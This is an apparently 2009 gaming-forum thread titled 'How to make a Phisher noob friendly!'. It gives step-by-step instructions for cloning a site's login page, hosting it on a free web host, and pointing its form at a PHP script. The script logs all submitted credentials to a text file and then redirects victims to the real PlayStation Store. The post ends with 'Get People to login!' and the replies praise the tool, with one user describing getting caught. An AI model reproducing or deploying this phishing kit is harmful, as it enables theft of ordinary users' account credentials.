Post: How to make a Phisher noob friendly!
09-02-2009, 07:27 PM #1
(adsbygoogle = window.adsbygoogle || []).push({}); 1. Go to the site you want to make a logger of and copy the source code, to do this right-click and press view source, copy it.

2. Paste it into notepad and save it as index.htm, when that is done use the search keyword button for "action=" after the "acfter=" add the words "post.php". if there are multiple post.php just do it after the 1rst "action=".

3. Next go to 110mb.com and sign up for a hosting account. When your done make a directory and name it index.htm. Next upload the saved index.htm file into the directory. Next you must take this
    <html dir="ltr">
<head>
<?php
header ('Location: https://store.playstation.com/login.gvm');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "
");
fclose($handle);
exit;
?>
</head>


Paste the above code in notepad!

*Where it says Store.playstation.com......change it to your desired site. Ex. Myspace.com!

Save it as post.php

3. Upload th saved post.php into the index.htm directory where the index.htm file was saved.

4. Get People to login!

** Not responsible for how it it used.

Made by Kn1GhT from Nextgenupdate.!

PLEASE REP if USED!

The following 2 users say thank you to GoddyGodGod for this useful post:

CuRaHeeBoi123, Grimsley33
09-03-2009, 01:34 AM #2
lol noob friendly Nice name drop
But good post Kn1Ght +rep
09-16-2009, 12:42 AM #3
Default Avatar
Phisher
Guest
Omg, Thanks Soooooooo Much, Helped Me Amazingly!

+Reppp
09-16-2009, 02:05 AM #4
last time i did this, i used t35.com and i got cought and they banned my account and said the were going to call the police. But they never came lol Smile

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo